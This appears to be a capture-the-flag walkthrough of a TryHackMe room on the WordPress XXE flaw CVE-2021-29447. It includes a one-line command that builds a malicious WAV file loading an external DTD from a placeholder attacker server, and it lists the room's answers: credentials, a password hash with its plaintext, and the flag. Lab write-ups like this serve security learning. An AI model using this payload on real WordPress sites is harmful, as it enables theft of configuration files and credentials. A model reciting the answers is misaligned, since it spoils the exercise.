We covered a wordpress XXE vulnerability CVE-2021-29447 that allows for sensitive files disclosure and server-side request forgery (SSRF). We exploited this WordPress vulnerability by generating WAV payload and uploading it to the compromised WordPress website. This was part of TryHackMe WordPress: CVE-2021-29447 Room.
Splunk SIEM Full Course with Practical Scenarios
Highlights
What is XXE vulnerability
An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.
WordPress CVE-2021-29447 Impact
- Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
- Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
Creating The Payload
You can create a WAV payload using the the commands shown below
nano poc.wav
# create a wav file
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
# paste the payload using echo, change the ip and port to match yours
References
- WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated): Exploit-DB
- WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): Github
- WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: wpscan
Room Answers
Based on the results of #1, what is the name of the database for WordPress?
wordpressdb2
Based on the results of #1, what are the credentials you found?
example: user:password
thedarktangent:sUp3rS3cret132
Enumerate and identify what is the dbms installed on the server?
MySQL
Based on the results of #4, what is the dbms version installed on the server?
5.7.33
Based on the results of #4, what port is the dbms running on?
3306
Compromise the dbms, What is the encrypted password located in the wordpress users table with id 1??
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
Based on the results of #7, What is the password in plaint text?
teddybear
Compromise the machine and locate flag.txt
thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}
Video Walkthrough